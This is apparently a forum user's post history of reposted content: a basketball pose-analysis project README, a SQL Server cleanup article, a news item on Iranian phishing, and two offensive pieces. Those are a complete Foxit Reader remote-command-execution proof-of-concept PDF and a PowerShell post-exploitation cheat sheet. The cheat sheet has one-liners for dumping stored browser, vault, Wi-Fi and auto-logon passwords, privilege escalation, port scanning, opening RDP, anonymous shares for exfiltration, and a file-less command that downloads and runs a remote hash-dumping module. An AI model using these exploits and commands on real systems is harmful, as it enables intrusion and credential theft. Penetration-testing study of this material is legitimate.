Everything posted by Kev
-
This is an artificial intelligence application built on the concept of object detection. It analyzes basketball shots by digging into the data collected from object detection. You can get the results by simply uploading files to the web app or by submitting a POST request to the API. Please check the features below; more features are coming up, so feel free to follow the project. All the data for the shooting pose analysis is calculated with OpenPose. Please note that this implementation is for noncommercial research use only. Please read the LICENSE, which is exactly the same as CMU's OpenPose license. If you are interested in the concept of human pose estimation, I have written a research paper summary of OpenPose. Check it out! Getting Started These instructions will get you a copy of the project up and running on your local machine. Get a copy Get a copy of this project by simply running the git clone command. git clone https://github.com/chonyy/AI-basketball-analysis.git Prerequisites Before running the project, we have to install all the dependencies from requirements.txt: pip install -r requirements.txt Please note that you need a GPU with a proper CUDA setup to run the video analysis, since a CUDA device is required to run OpenPose. Hosting Last, get the project hosted on your local machine with a single command: python app.py Alternatives This project is also hosted on Heroku. However, the heavy computation of TensorFlow may cause a Timeout error and crash the app (especially for video analysis), so hosting the project on your local machine is preferable. Please note that the shooting pose analysis won't run on the Heroku-hosted website, since a CUDA device is required to run OpenPose. Project Structure Features This project has three main features: shot analysis, shot detection, and a detection API. Shot and Pose analysis Shot counting Counts shooting attempts and missed and scored shots from the input video. 
Detection keypoints in different colors have different meanings, listed below: Blue: detected basketball in normal status Purple: undetermined shot Green: shot went in Red: missed shot Pose analysis OpenPose is implemented to calculate the angles of the elbow and knee during shooting. The release angle and release time are calculated from all the data collected in the shot analysis and pose analysis. Please note that there will be a relatively large error in the release time, since it is calculated as the total time the ball is in the hand. Shot detection The detection is shown on the image, with the confidence and the coordinates of each detection listed below it. Detection API Get a JSON response by submitting a POST request to (./detection_json) with "image" as the key and the input image as the value. Detection model The object detection model is trained with the Faster R-CNN architecture, starting from weights pretrained on the COCO dataset; the configuration is taken from the model architecture and the model is then trained on my own dataset. Future plans Host it on the Azure web app service. Improve the efficiency, making it executable on web app services. Download: AI-basketball-analysis-master.zip or git clone https://github.com/chonyy/AI-basketball-analysis.git Source
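The detection API described above takes a POST request with "image" as the key and the image file as the value. A minimal client sketch in Python stdlib follows; the host/port (localhost:5000) and the JSON response shape are assumptions about a default local deployment, not something confirmed by the README, so adjust them to your setup:

```python
import json
import urllib.request
import uuid


def build_multipart(field_name, filename, payload):
    """Build a multipart/form-data body carrying a single file field."""
    boundary = uuid.uuid4().hex
    parts = [
        ("--%s\r\n" % boundary).encode(),
        ('Content-Disposition: form-data; name="%s"; filename="%s"\r\n'
         % (field_name, filename)).encode(),
        b"Content-Type: application/octet-stream\r\n\r\n",
        payload,
        ("\r\n--%s--\r\n" % boundary).encode(),
    ]
    return b"".join(parts), "multipart/form-data; boundary=" + boundary


def detect(image_path, url="http://localhost:5000/detection_json"):
    """POST the image under the "image" key; assumes the app is running locally."""
    with open(image_path, "rb") as f:
        payload = f.read()
    body, content_type = build_multipart("image", image_path, payload)
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", content_type)
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read())
```

The same request can of course be issued with curl or the requests library; the point is only that the endpoint expects a standard multipart file upload.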
-
# Exploit Title: Foxit Reader 9.7.1 - Remote Command Execution (Javascript API) # Exploit Author: Nassim Asrir # Vendor Homepage: https://www.foxitsoftware.com/ # Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker to execute local files on the file system and bypass the security dialog. The exploit process need the user-interaction (Opening the PDF) . + Process continuation #POC %PDF-1.4 %ÓôÌá 1 0 obj << /CreationDate(D:20200821171007+02'00') /Title(Hi, Can you see me ?) /Creator(AnonymousUser) >> endobj 2 0 obj << /Type/Catalog /Pages 3 0 R /Names << /JavaScript 10 0 R >> >> endobj 3 0 obj << /Type/Pages /Count 1 /Kids[4 0 R] >> endobj 4 0 obj << /Type/Page /MediaBox[0 0 595 842] /Parent 3 0 R /Contents 5 0 R /Resources << /ProcSet [/PDF/Text/ImageB/ImageC/ImageI] /ExtGState << /GS0 6 0 R >> /Font << /F0 8 0 R >> >> /Group << /CS/DeviceRGB /S/Transparency /I false /K false >> >> endobj 5 0 obj << /Length 94 /Filter/FlateDecode >> stream xœŠ»@@EûùŠ[RØk x•ÄüW"DDçëœâžÜœ›b°ý“{‡éTg†¼tS)dÛ‘±=dœþ+9Ÿ_ÄifÔÈŒ [ŽãB_5!d§ZhP>¯ ‰ endstream endobj 6 0 obj << /Type/ExtGState /ca 1 >> endobj 7 0 obj << /Type/FontDescriptor /Ascent 833 /CapHeight 592 /Descent -300 /Flags 32 /FontBBox[-192 -710 702 1221] /ItalicAngle 0 /StemV 0 /XHeight 443 /FontName/CourierNew,Bold >> endobj 8 0 obj << /Type/Font /Subtype/TrueType /BaseFont/CourierNew,Bold /Encoding/WinAnsiEncoding /FontDescriptor 7 0 R /FirstChar 0 /LastChar 255 /Widths[600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 
600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600] >> endobj 9 0 obj << /S/JavaScript /JS(app.opencPDFWebPage\('C:\\\\Windows\\\\System32\\\\calc.exe'\) ) >> endobj 10 0 obj << /Names[(EmbeddedJS)9 0 R] >> endobj xref 0 11 0000000000 65535 f 0000000015 00000 n 0000000170 00000 n 0000000250 00000 n 0000000305 00000 n 0000000560 00000 n 0000000724 00000 n 0000000767 00000 n 0000000953 00000 n 0000002137 00000 n 0000002235 00000 n trailer << /ID[<7018DE6859F23E419162D213F5C4D583><7018DE6859F23E419162D213F5C4D583>] /Info 1 0 R /Root 2 0 R /Size 11 >> startxref 2283 %%EOF Source exploit-db.com
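A quick defensive note, not part of the original advisory: since this PoC embeds a plain JavaScript call to app.opencPDFWebPage, a naive triage step is to scan incoming PDFs for that API name. A minimal sketch in Python; app.launchURL is included only as a further example of an API worth flagging, and the check deliberately ignores compressed or obfuscated JavaScript streams, which it will miss:

```python
# API names to flag in raw PDF bytes; app.launchURL is an illustrative extra.
RISKY_FOXIT_APIS = (b"app.opencPDFWebPage", b"app.launchURL")


def find_risky_apis(pdf_bytes):
    """Return the risky API names that appear verbatim in the raw PDF bytes.

    Naive by design: JavaScript inside a PDF may live in a compressed
    (FlateDecode) stream or be string-obfuscated, in which case a plain
    substring scan will not see it.
    """
    return [api for api in RISKY_FOXIT_APIS if api in pdf_bytes]
```

For anything beyond a first-pass triage, decode the streams first (e.g. with a proper PDF parser) before searching.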
-
-
In this article, I am going to show how we can automate the reporting of unused database files using T-SQL. Introduction Organizations often have a well-defined process to decommission client databases. I helped one of my customers establish such a process. Before decommissioning a client database, they wanted me to generate a backup of the database and detach the primary and secondary data files and the transaction log files. I created a SQL Server job to automate the entire process. There was a glitch in this process, however: after a database is decommissioned, its data files and log files are left unattended, and because of that the disk drives start filling up. To fix this issue, we decided to create another SQL job that generates the list of unused database files and log files and emails it to the stakeholders. They verify the list of files and provide the approval to delete them. I created a stored procedure that identifies the database files and log files that are not attached to any database, displays the output in an HTML-formatted table, and emails it using Database Mail. The script performs the following tasks: Define temp tables to save the list of the drives and database files Use xp_fixeddrives to save the drive letter and free space in the #tbldrive table Use the dir command to get the list of all database files and store them in the #tblFiles table Compare the list of the files to the output of sys.master_files to get the physical files that are not attached to any database Create temp tables First, let us create a temp table named #tbldrive to save the list of the drives and the free space on each drive, and #tblFiles to hold the physical locations of files with *.mdf, *.ndf, and *.ldf extensions. 
Following is the T-SQL query to create the tables:

create table #tbldrive (ID INT IDENTITY(1,1), [DriveLetter] VARCHAR(1), [Free_Space] INT)
Go
create table #tblFiles (ID INT IDENTITY(1,1), [FilePath] NVARCHAR(max))
Go

Insert drive letter details in temp table Run the following T-SQL query to insert the list of drives and their free space into the #tbldrive table:

INSERT INTO #tbldrive ([DriveLetter], [Free_Space]) EXEC xp_fixeddrives;

Insert list of files in temp table To insert the physical locations of the files into the temp table, we must build a dynamic T-SQL query that uses the drive letters stored in #tbldrive to construct a dir command. In the dir command, we are going to use the /S /B flags, which return the full paths of the files with *.mdf and *.ldf extensions. The following code generates the dir command (note that @i must be initialized to 1; otherwise the WHILE loop never runs):

DECLARE @DriveLetter NVARCHAR(1);
DECLARE @DriveCommand NVARCHAR(4000);
DECLARE @i INT;
SET @i = 1;
WHILE ISNULL(@i, 0) > 0
BEGIN
    --get next available drive
    SET @DriveLetter = (SELECT [DriveLetter] FROM #tbldrive WHERE ID = @i);
    --create the command to get directory information
    SET @DriveCommand = N'dir ' + @DriveLetter + ':\*.*df /S/B';
    --print the command for the current drive
    SELECT @DriveCommand;
    SET @i = (SELECT [ID] + 1 FROM #tbldrive WHERE ID = @i);
    IF @i IS NULL SET @i = 0;
END;

Command Output: Now, as mentioned, we will insert the output of the command into #tblFiles. To do that, replace the SELECT with the following T-SQL block inside the WHILE loop. 
INSERT INTO #tblFiles ([FilePath]) EXEC xp_cmdshell @DriveCommand;

The entire code block is as follows:

set nocount on;
DECLARE @DriveLetter NVARCHAR(1);
DECLARE @DriveCommand NVARCHAR(4000);
DECLARE @i INT;
SET @i = 1;
WHILE ISNULL(@i, 0) > 0
BEGIN
    --get next available drive
    SET @DriveLetter = (SELECT [DriveLetter] FROM #tbldrive WHERE ID = @i);
    --create the command to get directory information
    SET @DriveCommand = N'dir ' + @DriveLetter + ':\*.*df /S/B';
    --get directory information for the current drive
    INSERT INTO #tblFiles ([FilePath])
    EXEC xp_cmdshell @DriveCommand;
    SET @i = (SELECT [ID] + 1 FROM #tbldrive WHERE ID = @i);
    IF @i IS NULL SET @i = 0;
END;

select FilePath from #tblFiles
drop table #tbldrive
drop table #tblFiles

The output, listing the physical locations of the mdf and ldf files, is the following: Compare the list with the output of sys.master_files Now, we will compare the physical locations stored in #tblFiles with the values of the physical_name column in the sys.master_files catalog view. Following is the code:

select FilePath from #tblFiles
where FilePath not in (select physical_name from sys.master_files)
and FilePath not like 'C:\%'
and (FilePath like '%mdf' OR FilePath like '%ndf' OR FilePath like '%ldf')

The output is the following: Now, to display the output in the email, we will use HTML. The HTML code for the table will be stored in the @UnusedDatabaseFiles variable, whose data type is nvarchar(max). 
Following is the code:

SET @UnusedDatabaseFiles = '<table id="AutoNumber1" style="BORDER-COLLAPSE: collapse" borderColor="#111111" height="40" cellSpacing="0" cellPadding="0" width="50%" border="1">
<tr>
<td width="27%" bgColor="#D3D3D3" height="15"><b>
<font face="Verdana" size="1" color="#FFFFFF">Database Files </font></b></td>
</tr>
<p style="margin-top: 1; margin-bottom: 0"> </p>
<p><font face="Verdana" size="4">List of unused database files</font></p>'

SELECT @UnusedDatabaseFiles = @UnusedDatabaseFiles + '<tr><td><font face="Verdana" size="1">' + CONVERT(VARCHAR, filepath) + '</font></td></tr>'
FROM #tblfiles
WHERE filepath NOT IN (SELECT physical_name FROM sys.master_files)
AND filepath NOT LIKE 'C:\%'
AND ( filepath LIKE '%mdf' OR filepath LIKE '%ndf' OR filepath LIKE '%ldf' )

To send the email, we will use SQL Server Database Mail. I have already created a database mail profile named OutlookMail. The code to email the list of unused database files is as follows:

EXEC msdb.dbo.sp_send_dbmail
    @profile_name = 'yourmailprofile',
    @recipients='n******87@outlook.com',
    @subject = 'List of unused database files',
    @body = @UnusedDatabaseFiles,
    @body_format = 'HTML' ;

Create a SQL Server Agent Job Once the stored procedure is created, we will use a SQL Server Agent job to automate it. For that: Open SQL Server Management Studio Expand the SQL Server instance Expand SQL Server Agent Right-click on Jobs Select New Job On the New Job dialog box, provide the desired name of the SQL job in the Job Name text box. Click on Steps and click on New to create a job step. In the New Job Step dialog box, choose Transact-SQL from the Type drop-down box and enter the following T-SQL code in the command textbox:

Use DBA
GO
Exec sp_getunuseddatabases

Click OK to save the step and close the dialog box. We will schedule the job to run every week on Monday at 9:00 AM; therefore, configure the schedule accordingly. To do that, click on Schedules in the New Job dialog box. 
On the New Schedule dialog box, enter the desired schedule name in the Name textbox, choose Weekly from the Occurs drop-down box, click on the Monday checkbox, and enter 09:00:00 in the Occurs once at textbox. See the following screenshot. Click OK to save the schedule and close the New Job Schedule dialog box. Click OK to save the SQL job. Now let us test the SQL job. To do that, right-click on the SQL job and click Start Job at Step. Once the job completes the execution, you will receive the email, as shown below. Summary In this article, I have shown a T-SQL script that generates a list of unused database data files and log files. Moreover, I have also explained how we can display the list of the files in an HTML-formatted table and automate the report using a SQL Server Agent job. Source sqlshack.com
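The heart of the script above is just a set difference: files found on disk minus files registered in sys.master_files, filtered by extension and drive. The same logic in a database-free Python sketch (the file paths are purely illustrative):

```python
# Extensions the T-SQL script looks for: data, secondary data, and log files.
DB_EXTENSIONS = (".mdf", ".ndf", ".ldf")


def unused_database_files(files_on_disk, attached_files):
    """Return data/log files present on disk but not attached to any database.

    Mirrors the T-SQL comparison: keep only database file extensions,
    exclude the system drive (C:\\), and drop every path that
    sys.master_files already accounts for. Comparison is case-insensitive,
    matching Windows path semantics.
    """
    attached = {p.lower() for p in attached_files}
    return sorted(
        p for p in files_on_disk
        if p.lower().endswith(DB_EXTENSIONS)
        and not p.lower().startswith("c:\\")
        and p.lower() not in attached
    )
```

This also makes the script's caveat visible: anything on C:\ is skipped wholesale, so unused files on the system drive would never be reported.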
-
Looking for a programmer for metal scaffolding design software
Kev replied to donaty33's topic in Locuri de munca (Jobs)
https://www.ekscaffolddesign.com/2D-SCAFFOLD-DESIGN-DRAWINGS-AND-CALCULATIONS.html -
NATO Secretary General Jens Stoltenberg addresses the Munich Security Conference in 2015. (NATO / Flickr) Iranian government-linked hackers have been sending spearphishing emails to large swaths of high-profile potential attendees of the upcoming Munich Security Conference as well as the Think 20 Summit in Saudi Arabia, according to Microsoft research. The Iranian attackers, known as Phosphorus, have disguised themselves as conference organizers and have sent fake invitations containing PDF documents with malicious links to over 100 possible invitees of the conferences, both of which are prominent summits dedicated to international security and the policies of the world's largest economies, respectively. In some cases the attackers have been successful in guiding victims to those links, which lead to credential-harvesting pages, Tom Burt, corporate vice president of Microsoft Customer Security and Trust, announced in a blog published Wednesday morning. Microsoft did not say what information, if any, the attackers successfully stole from victims. It was just the latest example of Phosphorus targeting non-governmental entities; the group has been known to target journalists and researchers who focus on Iran in the past, for instance. The hackers typically also go after entities in the military, energy, business services, and telecommunications sectors throughout the U.S. and the Middle East, according to previous FireEye research. The Iranian government-linked hackers tend to conduct long-term strategic intelligence gathering, according to FireEye. Although Microsoft is releasing the information on the threat to Munich Security Conference attendees in close proximity to the U.S. presidential elections, Microsoft researchers do not believe this specific campaign is linked with the election. 
But the same hackers behind this operation, also known as APT35 or Charming Kitten, have targeted associates of President Donald Trump’s reelection campaign before, according to previous Microsoft and Google research. In recent months the hackers have targeted the Trump campaign, according to research Microsoft published last month and Google research published in June. The same group was targeting journalists and the email accounts of people associated with the Trump campaign one year ago as well. Via cyberscoop.com
-
This article contains a list of PowerShell commands collected from various corners of the Internet which could be helpful during penetration tests or red team exercises. The list includes various post-exploitation one-liners in pure PowerShell without requiring any offensive (= potentially flagged as malicious) 3rd party modules, but also a bunch of handy administrative commands. Let’s get to it! Table Of Contents Locating files with sensitive information Find potentially interesting files Find credentials in Sysprep or Unattend files Find configuration files containing “password” string Find database credentials in configuration files Locate web server configuration files Extracting credentials Get stored passwords from Windows PasswordVault Get stored passwords from Windows Credential Manager Dump passwords from Google Chrome browser Get stored Wi-Fi passwords from Wireless Profiles Search for SNMP community string in registry Search for string pattern in registry Privilege escalation Search registry for auto-logon credentials Check if AlwaysInstallElevated is enabled Find unquoted service paths Check for LSASS WDigest caching Credentials in SYSVOL and Group Policy Preferences (GPP) Network related commands Set MAC address from command-line Allow Remote Desktop connections Host discovery using mass DNS reverse lookup Port scan a host for interesting ports Port scan a network for a single port (port-sweep) Create a guest SMB shared drive Whitelist an IP address in Windows firewall Other useful commands File-less download and execute Get SID of the current user Check if we are running with elevated (admin) privileges Disable PowerShell command logging List installed antivirus (AV) products Conclusion Locating files with sensitive information The following PowerShell commands can be handy during post-exploitation phase for locating files on disk that may contain credentials, configuration details and other sensitive information. 
Find potentially interesting files With this command we can identify files with potentially sensitive data such as account information, credentials, configuration files etc. based on their filename: gci c:\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue Although this can produce a lot of noise, it can also yield some very interesting results. It is recommended to do this for every disk drive, but you can also just run it on the c:\users folder for some quick wins. Find credentials in Sysprep or Unattend files This command will look for remnants from automated installation and auto-configuration, which could potentially contain plaintext or base64-encoded passwords: gci c:\ -Include *sysprep.inf,*sysprep.xml,*sysprep.txt,*unattended.xml,*unattend.xml,*unattend.txt -File -Recurse -EA SilentlyContinue This is one of the well-known privilege escalation techniques, as the password is typically the local administrator password. It is recommended to do this for every disk drive. Find configuration files containing “password” string With this command we can locate files containing a certain pattern, e.g. here we are looking for a “password” pattern in various textual configuration files: gci c:\ -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern "password" Although this can produce a lot of noise, it could also yield some interesting results. It is recommended to do this for every disk drive. Find database credentials in configuration files Using the following PowerShell command we can find database connection strings (with plaintext credentials) stored in various configuration files such as web.config for ASP.NET configuration, in Visual Studio project files etc.: gci c:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString" Finding connection strings e.g. 
for a remote Microsoft SQL Server could lead to a Remote Command Execution (RCE) using the xp_cmdshell functionality and consequent lateral movement. Locate web server configuration files With this command, we can easily find configuration files belonging to Microsoft IIS, XAMPP, Apache, PHP or MySQL installations: gci c:\ -Include web.config,applicationHost.config,php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -EA SilentlyContinue These files may contain plain text passwords or other interesting information which could allow accessing other resources such as databases, administrative interfaces etc. Extracting credentials The following PowerShell commands also fall under the post-exploitation category and they can be useful for extracting credentials after gaining access to a Windows system. Get stored passwords from Windows PasswordVault Using the following PowerShell command we can extract secrets from the Windows PasswordVault, which is a Windows built-in mechanism for storing passwords and web credentials e.g. for Internet Explorer, Edge and other applications: [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword();$_ } Note that the vault is typically stored in the following locations and it is only possible to retrieve the secrets under the context of the currently logged-in user: C:\Users\<USERNAME>\AppData\Local\Microsoft\Vault\ C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault\ C:\ProgramData\Microsoft\Vault\ More information about Windows PasswordVault can be found here. 
Get stored passwords from Windows Credential Manager Windows Credential Manager provides another mechanism of storing credentials for signing in to websites, logging in to remote systems and various applications, and it also provides a secure way of using credentials in PowerShell scripts. With the following one-liner, we can retrieve all stored credentials from the Credential Manager using the CredentialManager PowerShell module: Get-StoredCredential | % { write-host -NoNewLine $_.username; write-host -NoNewLine ":" ; $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password) ; [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p); } Similarly to PasswordVault, the credentials are stored in individual user profile locations and only the currently logged-in user can decrypt theirs: C:\Users\<USERNAME>\AppData\Local\Microsoft\Credentials\ C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Credentials\ C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\ Dump passwords from Google Chrome browser The following command extracts stored credentials from the Google Chrome browser, if it is installed and if there are any passwords stored (note that this snippet is a fragment: it assumes $datarow already holds a row read from Chrome's "Login Data" SQLite database, so it will not run on its own): [System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($datarow.password_value,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)) Similarly, this has to be executed under the context of the target (victim) user. Get stored Wi-Fi passwords from Wireless Profiles With this command we can extract all stored Wi-Fi passwords (WEP, WPA PSK, WPA2 PSK etc.) 
from the wireless profiles that are configured in the Windows system: (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize Note that we have to have administrative privileges in order for this to work. Search for SNMP community string in registry The following command will extract SNMP community string stored in the registry, if there is any: gci HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse -EA SilentlyContinue Finding a SNMP community string is not a critical issue, but it could be useful to: Understand what kind of password patterns are used among sysadmins in the organization Perform password spraying attack (assuming that passwords might be re-used elsewhere) Search for string pattern in registry The following PowerShell command will sift through the selected registry hives (HKCR, HKCU, HKLM, HKU, and HKCC) and recursively search for any chosen pattern within the registry key names or data values. In this case we are searching for the “password” pattern: $pattern = "password" $hives = "HKEY_CLASSES_ROOT","HKEY_CURRENT_USER","HKEY_LOCAL_MACHINE","HKEY_USERS","HKEY_CURRENT_CONFIG" # Search in registry keys foreach ($r in $hives) { gci "registry::${r}\" -rec -ea SilentlyContinue | sls "$pattern" } # Search in registry values foreach ($r in $hives) { gci "registry::${r}\" -rec -ea SilentlyContinue | % { if((gp $_.PsPath -ea SilentlyContinue) -match "$pattern") { $_.PsPath; $_ | out-string -stream | sls "$pattern" }}} Although this could take a lot of time and produce a lot of noise, it will certainly find every occurrence of the chosen pattern in the registry. 
Privilege escalation The following sections contain PowerShell commands useful for privilege escalation attacks – for cases when we only have low-privileged user access and we want to escalate our privileges to local administrator. Search registry for auto-logon credentials Windows systems can be configured to log in automatically upon boot, which is for example used on POS (point of sale) systems. Typically, this is configured by storing the username and password in a specific Winlogon registry location, in clear text. The following command will get the auto-logon credentials from the registry: gp 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon' | select "Default*" Check if AlwaysInstallElevated is enabled If the following AlwaysInstallElevated registry keys are set to 1, it means that any low-privileged user can install *.msi files with NT AUTHORITY\SYSTEM privileges. Here’s how to check it with PowerShell: gp 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated gp 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated Note that both registry keys have to be set to 1 in order for this to work. An MSI installer package can be easily generated using the msfvenom utility from the Metasploit Framework. For instance, we can add ourselves into the administrators group: msfvenom -p windows/exec CMD='net localgroup administrators joe /add' -f msi > pkg.msi Find unquoted service paths The following PowerShell command will print out services whose executable path is not enclosed within quotes (“): gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name This can lead to privilege escalation in case the executable path also contains spaces and we have write permissions to any of the folders in the path. 
More details about this technique, including exploitation steps, can be found here or here. Check for LSASS WDigest caching Using the following command we can check whether WDigest credential caching is enabled on the system or not. This setting dictates whether we will be able to use Mimikatz to extract plaintext credentials from the LSASS process memory. (gp registry::HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest).UseLogonCredential If the value is set to 0, then the caching is disabled (the system is protected) If it doesn’t exist or if it is set to 1, then the caching is enabled Note that if it is disabled, we can still enable it using the following command, but we will also have to restart the system afterwards: sp registry::HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest -name UseLogonCredential -value 1 Credentials in SYSVOL and Group Policy Preferences (GPP) In corporate Windows Active Directory environments, credentials can sometimes be found stored in the Group Policies, in various custom scripts or configuration files on the domain controllers in the SYSVOL network shares. Since the SYSVOL network shares are accessible to any authenticated domain user, we can easily identify whether there are any stored credentials using the following command: Push-Location \\example.com\sysvol gci * -Include *.xml,*.txt,*.bat,*.ps1,*.psm,*.psd -Recurse -EA SilentlyContinue | select-string password Pop-Location One typical example is MS14-025 with the cPassword attribute in the GPP XML files. The “cpassword” attribute can be instantly decrypted into plaintext form, e.g. by using the gpp-decrypt utility in Kali Linux. Network related commands Here are a few network-related PowerShell commands that can be useful particularly during internal network penetration tests and similar exercises. 
Set MAC address from command-line Sometimes it can be useful to set MAC address on a network interface and with PowerShell we can easily do it without using any 3rd party utility: Set-NetAdapter -Name "Ethernet0" -MacAddress "00-01-18-57-1B-0D" This can be useful e.g. when we are testing for NAC (network access control) bypass and other things. Allow Remote Desktop connections This command trio can be useful when we want to connect to the system using graphical RDP session, but it is not enabled for some reason: # Allow RDP connections (Get-WmiObject -Class "Win32_TerminalServiceSetting" -Namespace root\cimv2\terminalservices).SetAllowTsConnections(1) # Disable NLA (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0) # Allow RDP on the firewall Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Set-NetFirewallRule -Enabled True Now the port tcp/3389 should be open and we should be able to connect without a problem e.g. by using xfreerdp or rdesktop tools from Kali Linux. Host discovery using mass DNS reverse lookup Using this command we can perform quick reverse DNS lookup on the 10.10.1.0/24 subnet and see if there are any resolvable (potentially alive) hosts: $net = "10.10.1." 0..255 | foreach {$r=(Resolve-DNSname -ErrorAction SilentlyContinue $net$_ | ft NameHost -HideTableHeaders | Out-String).trim().replace("\s+","").replace("`r","").replace("`n"," "); Write-Output "$net$_ $r"} | tee ip_hostname.txt The results will be then saved in the ip_hostname.txt file in the current working directory. Sometimes this can be faster and more covert than a pingsweep or similar techniques. 
Port scan a host for interesting ports Here’s how to quickly port scan a specified IP address (10.10.15.232) for selected 39 interesting ports: $ports = "21 22 23 25 53 80 88 111 139 389 443 445 873 1099 1433 1521 1723 2049 2100 2121 3299 3306 3389 3632 4369 5038 5060 5432 5555 5900 5985 6000 6379 6667 8000 8080 8443 9200 27017" $ip = "10.10.15.232" $ports.split(" ") | % {echo ((new-object Net.Sockets.TcpClient).Connect($ip,$_)) "Port $_ is open on $ip"} 2>$null This will give us a quick situational awareness about a particular host on the network using nothing but a pure PowerShell: Port scan a network for a single port (port-sweep) This could be useful for example for quickly discovering SSH interfaces (port tcp/22) on a specified network Class C subnet (10.10.0.0/24): $port = 22 $net = "10.10.0." 0..255 | foreach { echo ((new-object Net.Sockets.TcpClient).Connect($net+$_,$port)) "Port $port is open on $net$_"} 2>$null If you are trying to identify just Windows systems, just change the port to 445. Create a guest SMB shared drive Here’s a cool trick to quickly start a SMB (CIFS) network shared drive accessible by anyone: new-item "c:\users\public\share" -itemtype directory New-SmbShare -Name "sharedir" -Path "C:\users\public\share" -FullAccess "Everyone","Guests","Anonymous Logon" To stop it afterwards, execute: Remove-SmbShare -Name "sharedir" -Force This could come handy for transferring files, exfiltration etc. Whitelist an IP address in Windows firewall Here’s a useful command to whitelist an IP address in the Windows firewall: New-NetFirewallRule -Action Allow -DisplayName "pentest" -RemoteAddress 10.10.15.123 Now we should be able to connect to this host from our IP address (10.10.15.123) on every port. 
After we are done with our business, remove the rule:

Remove-NetFirewallRule -DisplayName "pentest"

Other useful commands

The following commands can be useful for performing various administrative tasks, gathering information about the system, or using additional PowerShell functionality during a pentest.

File-less download and execute

Using this tiny PowerShell command we can easily download and execute arbitrary PowerShell code hosted remotely – either on our own machine or on the Internet:

iex(iwr("https://URL"))

iwr = Invoke-WebRequest
iex = Invoke-Expression

The remote content will be downloaded and loaded without touching the disk (file-less). Now we can just run it. We can use this for any number of popular offensive modules, e.g.:

https://github.com/samratashok/nishang
https://github.com/PowerShellMafia/PowerSploit
https://github.com/FuzzySecurity/PowerShell-Suite
https://github.com/EmpireProject/Empire (modules here)

Here’s an example of dumping local password hashes (hashdump) using the nishang Get-PassHashes module:

iex(iwr("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1"));Get-PassHashes

Very easy, but note that this will likely be flagged by any decent AV or EDR. In cases like this, you could obfuscate the modules you want to use and host them somewhere on your own.
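Conceptually, iex(iwr(...)) is just "fetch text, evaluate it in memory". A hedged Python sketch of the same pattern follows (the helper names are hypothetical; the fetcher is injectable so the idea can be demonstrated offline, and executing remote code is exactly as dangerous as it sounds):

```python
from urllib.request import urlopen

def fetch(url):
    """Download remote text into memory -- nothing touches disk."""
    with urlopen(url) as resp:
        return resp.read().decode()

def load_remote(url, fetch=fetch):
    """Python analogue of iex(iwr(URL)): fetch code, then exec it in-memory.

    Returns the namespace the code populated, so functions it defined
    can be called afterwards (like Get-PassHashes in the example above).
    """
    namespace = {}
    exec(fetch(url), namespace)  # compile + run without writing a file
    return namespace
```

The key property in both languages is the same: the payload exists only in process memory, never as a file an on-access scanner could catch.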
Get SID of the current user

The following command will return the SID value of the current user:

([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value

Check if we are running with elevated (admin) privileges

Here’s a quick one-liner for checking whether we are running an elevated PowerShell session with Administrator privileges:

